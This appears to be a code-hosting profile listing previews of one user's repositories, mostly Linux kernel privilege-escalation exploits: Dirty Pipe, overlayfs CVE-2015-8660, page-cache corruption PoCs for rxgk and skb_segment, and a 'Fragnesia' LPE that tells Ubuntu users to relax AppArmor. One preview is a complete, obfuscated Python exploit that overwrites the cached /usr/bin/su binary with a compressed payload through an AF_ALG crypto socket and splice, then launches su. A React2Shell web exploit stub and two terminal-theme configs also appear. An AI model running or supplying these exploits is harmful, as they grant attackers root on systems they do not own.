spynika

/*
 * rxgk pagecache write — PoC for missing COW guard in rxgk_decrypt_skb()
 *
 * net/rxrpc/rxgk_common.h: rxgk_decrypt_skb() does skb_to_sgvec() then
 * crypto_krb5_decrypt() with no skb_cow_data().  The krb5enc AEAD template
 * (crypto/krb5enc.c) decrypts in-place BEFORE verifying the HMAC.  When skb
 * frag pages are pagecache pages (via splice → MSG_SPLICE_PAGES → loopback),
 * the in-place decrypt corrupts the page cache.
 *
 * The same pattern exists in rxkad (rxkad_verify_packet_2).

spynika

//
// dirtypipez.c
//
// hacked up Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn
// a root shell. (and attempts to restore the damaged binary as well)
//
// Wow, Dirty CoW reloaded!
//
// -- blasty <peter@haxx.in> // 2022-03-07
/* SPDX-License-Identifier: GPL-2.0 */

spynika

// gcc -O2 -Wall -Wextra -std=gnu11 -static -o skb_segment_exploit skb_segment_exploit.c
/*
 * skb_segment_exploit.c — CVE PoC: page-cache corruption via skb_segment()
 *                         SKBFL_SHARED_FRAG stripping + ESP-in-TCP decrypt
 *
 * Fork a sender+receiver pair to trigger one ESP-in-TCP decrypt cycle.
 *
 * Sender (in ns_sender):
 *   1. TCP connect to RECEIVER_ADDR:TCP_PORT
 *   2. send() an espintcp prefix (2-byte len + ESP hdr + IV) — normal data,

spynika

// Fragnesia: universal Linux LPE
// Ubuntu users: AppArmor interferes with using namespaces, you need to use
// `sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=0`.
//
// You can chain other bugs to bypass this requirement but this is out of scope for this vulnerability.
//
// Found with V12 by William Bowling on the V12 team
// V12 - https://v12.sh - dangerously powerful agentic security

// Patch: https://lists.openwall.net/netdev/2026/05/13/79

spynika

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/syscall.h>

spynika

#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

spynika

// CVE-2025-55182 - React2Shell Exploit
// Educational purposes only - Use at your own risk

const FormDataLib = require('form-data');

// Payload generators
function createBasicPayload() {
    return {
        '0': '$1',
        '1': {

spynika

{
  "$schema": "https://github.com/fastfetch-cli/fastfetch/raw/dev/doc/json_schema.json",
  "logo": {
    "source": "/home/haxor/.config/fastfetch/pngs/0day.png",
    "height": 18
  },
  "display": {
    "separator": " : "
  },
  "modules": [

spynika

# See this wiki page for more info:
# https://github.com/dylanaraps/neofetch/wiki/Customizing-Info
print_info() {

    prin "$(color 1)┌────────────────────────✪─────────────────────────┐"
    prin "$(color 2) upgrade your skill for your protection,$(color 3) haxor here"

    prin "$(color 1)└────────────────────────✪─────────────────────────┘"

spynika

/*
just another overlayfs exploit, works on kernels before 2015-12-26

# Exploit Title: overlayfs local root
# Date: 2016-01-05
# Exploit Author: rebel
# Version: Ubuntu 14.04 LTS, 15.10 and more
# Tested on: Ubuntu 14.04 LTS, 15.10
# CVE : CVE-2015-8660